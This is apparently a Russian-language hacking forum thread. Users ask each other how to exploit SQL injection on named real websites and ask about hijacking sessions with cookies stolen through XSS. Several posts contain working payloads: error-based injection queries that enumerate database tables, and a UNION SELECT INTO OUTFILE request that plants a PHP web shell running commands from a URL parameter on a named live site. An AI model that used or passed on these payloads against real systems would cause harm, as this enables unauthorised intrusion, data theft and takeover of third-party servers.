Всем привет, Нашел sql-inj, но не получается раскрутить: http://parus-grad.com.ua/SearchResult.html?ot=1' запросы типа http://parus-grad.com.ua/SearchResult.html?ot=(select+test) нормально проходят, но получить структуру таблиц в базе не получается. ругается то на 'TOP' то на 'FROM' Подскажите как добраться до списка таблиц на примере, а дальше я уже сам поковыряю. Спасибо!
может у меня кривые руки, помогите создать запрос http://www.globalwinn.ro/index.php?lang=-English&page=mlm-tomorow
Получил печеньки с xss уявимости, а там больше параметров чем при простом посещении сайта, подставляю только те что есть - не работает, создаю новые, которых нет, но которые пришли от чувака - не работает, что делать? что не так?
F яjHost 'тут айпи нашего админа' is not allowed to connect to this MySQL server что это такое что написано выше?это у меня появилось когда я сканировал свой серв на порты и серв мне дал скачать это тхт файл!(я/ знаю что админ управляет удаленно сервом!)
получается это на мой айпи написано а там где я отметил "айпи админа"говорит о том что ток он имеет право на управление сервером?
Всем привет! Как лучше составить запрос, что бы избавиться от ошибки "..more 1 rowe.." (дословно не помню) запрос такой: Code: ' or (select count(*) from information_schema.tables group by concat((select group_concat(table_name) from information_schema.tables limit 0,1),floor(rand(0)*2)))/* ----------------------------------------------------------------------------------- хочу внести некоторое дополнение: Redwood, спасибо, но я хочу использовать group_concat, т.к. после 3-х запросов блочится IP... так сказать, нужно сократить количество запросов. Как избежать ошибки Subquery returns more than 1 row при использовании group_concat в запросе выше.
999'+or+(select+count(*)+from+information_schema.tables+group+by+concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2)))--+
Хм.. при таком запросе, Code: 1' or (select count(*) from information_schema.tables group by concat((select concat_ws(0x3a,id,name,value,comments) from bla.configuration limit 0,1),floor(rand(0)*2)))/* тоже выдает Subquery returns more than 1 row С чем это может быть связано? ..таблица configuration единственная.
подскажите, тут просто ошибка mysql или можно что-то выкружить: http://jmatch.com/member/profile.php?profile_id=21295740'
Заливаю шелл PHP: http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2®ion_id=&pais_codigo=-1+UNION+SELECT+1,%27%3C?%20system%28$_GET[cmd]%29;%20?%3E%27,3,4,5%20from%20mysql.user%20into+outfile+%271.php%27 -- и никак не могу найти его ))